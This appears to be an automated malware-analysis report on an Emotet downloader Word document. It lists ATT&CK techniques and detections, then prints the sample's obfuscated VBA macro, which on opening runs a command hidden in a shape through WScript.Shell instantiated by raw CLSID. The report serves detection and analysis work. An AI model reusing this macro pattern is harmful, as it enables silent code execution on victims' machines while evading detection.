MALICIOUS
252
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1218.011 Signed Binary Proxy Execution: Rundll32
T1059.001 PowerShell
T1140 Deobfuscate or Obfuscate Malicious Code
T1566.001 Spearphishing Attachment
The sample contains VBA macros with an AutoOpen function, indicative of malicious intent. It leverages the dangerous WScript.Shell COM object to execute commands, likely for downloading and running a secondary payload. The ClamAV detection explicitly names Emotet, a known downloader family.
Heuristics 9
-
ClamAV: Doc.Downloader.Emotet-6826446-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6826446-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA instantiates a dangerous COM class by CLSID critical OLE_VBA_GETOBJECT_CLSID_DANGEROUSVBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.Matched line in script
End Select Set lWpSaF = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + MRCEVif + cfWwP + fCBpsz + nPYLbD) On Error Resume Next -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
End Select Set lWpSaF = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + MRCEVif + cfWwP + fCBpsz + nPYLbD) On Error Resume Next -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next -
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5001 bytes |
SHA-256: 91524fbfb3a552d96b10feec9f1abe40069d4b908c784baa9e8fd0e0a6770cd4 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
112 of 173 identifiers look randomly generated (e.g. 'NhQLQfwlaBSJn') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "iHOBqSAldadB"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case rssVuadT
Case 7431461
bcPiiiK = CBool(GnVMX)
cRvtrcHL = 131039611
HudsIUj = CBool(OwOPq)
Case 145014689
BzKzRTiVD = CBool(cfjcYRPIp)
oFRvlHM = Atn(aaMbZupdz)
CGcYaz = CBool(pzhpfwHB)
KwhOMKHju = Atn(190796375 * CLng(217435300))
End Select
Set pmuUB = Shapes("NhQLQfwlaBSJn")
On Error Resume Next
Select Case bGtwlAO
Case 234272584
lhAlL = CBool(kNliC)
jobhj = 241503370
WYjvpCIBA = CBool(ZwnjvJjNM)
Case 36830349
rKNWZVuRS = CBool(BPXMdF)
LjCAjPLi = Atn(XlfrUX)
sfNTZQj = CBool(jijXjP)
SEwCdCz = Atn(50389999 * CLng(309798784))
End Select
WzKifFWORWi = "" + fhPmMvC + wJmaw + AjoBzA + tRtcuXS + pmuUB.TextFrame.TextRange.Text + pDSlHaO + GiEzIkt + jikIk + LNmKz + UbpTkTsw
On Error Resume Next
Select Case rHYfT
Case 283156215
mTlapsdw = CBool(KazuGNRok)
nCYvz = 268195053
EStiwcZo = CBool(widBQn)
Case 149083892
CoLEvipj = CBool(KDkOXolGn)
CONwYF = Atn(RnLisAfss)
diIoE = CBool(CSWEBYqru)
cURpqnw = Atn(29794688 * CLng(83148233))
End Select
On Error Resume Next
Select Case tiWhQtm
Case 116477639
jIKwtM = CBool(BCtmQBzm)
ClrtdmQh = 210593100
YHjzTfP = CBool(FTsaaEK)
Case 136987834
wdNsijzOH = CBool(YltrcSUnc)
FZHBWtT = Atn(bLmjJwUES)
qXiiMkrs = CBool(bPIFQh)
kWWMVoQGm = Atn(317801614 * CLng(56140133))
End Select
Set lWpSaF = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + MRCEVif + cfWwP + fCBpsz + nPYLbD)
On Error Resume Next
Select Case zNrwwL
Case 68721804
otcqjXQU = CBool(BWjFsCc)
cTNEtvM = 151166701
XijmhD = CBool(dwwhnrN)
Case 159090100
JZjJMFKP = CBool(TrwcuzP)
PzhkkU = Atn(GbvEvl)
GpRkWfND = CBool(YTMNLd)
BBRTb = Atn(87935855 * CLng(282064522))
End Select
On Error Resume Next
Select Case hpIwX
Case 110413520
pGmSwRUXM = CBool(NHfBvFU)
TDjMDT = 6529678
MPllw = CBool(FftuXj)
Case 263227701
AuFPMS = CBool(DmkohDN)
dDTRvF = Atn(maiwC)
IAhnd = CBool(CpGoG)
aIdAzPMr = Atn(101102913 * CLng(106969043))
End Select
Const RmcCa = 0
On Error Resume Next
Select Case pmaMFKnK
Case 293360880
jcDLa = CBool(HjiXiGm)
ZMmTZDZz = 126278805
kSBEvQL = CBool(CzPLrC)
Case 85041545
OcZUCiz = CBool(nsXUlociJ)
bHXDkOM = Atn(EpSNUk)
wpzYw = CBool(CTJRDsq)
NUhCRaF = Atn(22526869 * CLng(74229139))
End Select
On Error Resume Next
Select Case ZWprZjMP
Case 211837363
kAwHZJPD = CBool(WXsHuwKTz)
YrRAahHlD = 193622773
GuMRjLSJk = CBool(uOIBI)
Case 216439552
vsONPW = CBool(qSzYZ)
YMatQd = Atn(qOmsJMki)
JzSAspK = CBool(jrYEaN)
tkRkio = Atn(92914447 * CLng(244321475))
End Select
On Error Resume Next
Select Case RZbIIz
Case 172545123
fPdiTNI = CBool(UtuvVBKNz)
BflPU = 213595769
siCSP = CBool(nrZPIL)
Case 17009969
jwtYK = CBool(MuPONKBz)
tPuwbaiGi = Atn(aGEvm)
CvzVi = CBool(rKuuwPnEE)
qwjzNO = Atn(176355816 * CLng(228591513))
End Select
On Error Resume Next
Select Case NjfbdM
Case 300889489
dXqSa = CBool(wjpZYv)
ETZALmtb = 221284423
jLzCYjLKa = CBool(HtVlFzA)
Case 266104435
wAUuWI = CBool(FbRazf)
fJHdMaAiP = Atn(UhKzouLlF)
lrLRat = CBool(iksza)
zqbwWnO = Atn(102803920 * CLng(121113587))
End Select
On Error Resume Next
Select Case TASoZLpmA
Case 259174217
pOUcNrUa = CBool(VJBcfuAPt)
bfNUjKiGF = 301322238
CokWtdL = CBool(OwuObVK)
Case 336269912
JiKatELIc = CBool(kSflPjYSU)
FlRplf = Atn(hRlwZKswa)
zJjZORjb = CBool(iNiiDC)
ijXNVpOIi = Atn(284168830 * CLng(281235694))
End Select
lWpSaF.Run# WzKifFWORWi, RmcCa
On Error Resume Next
Select Case SwXPMw
Case 264960689
WvcDizt = CBool(cklritc)
ialXMJWUH = 298761793
XZTvEiIl = CBool(dIwvdO)
Case 311931377
sMmYUclm = CBool(QQNYI)
pRWFJpjJW = Atn(QRWiq)
zNkbuHHDw = CBool(JuRsXnVM)
dHJmw = Atn(79740558 * CLng(21389483))
End Select
On Error Resume Next
Select Case YOYjilLEj
Case 107707173
DYshJzQXc = CBool(oknNw)
EjoWcuC = 301418533
QLCKdIVWT = CBool(juVTKCz)
Case 131585393
jilSkLHU = CBool(uOIWwotmO)
wATOTk = Atn(fiPdTf)
RJOisSz = CBool(oabFTMw)
aYokVkQQ = Atn(121684110 * CLng(224527147))
End Select
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.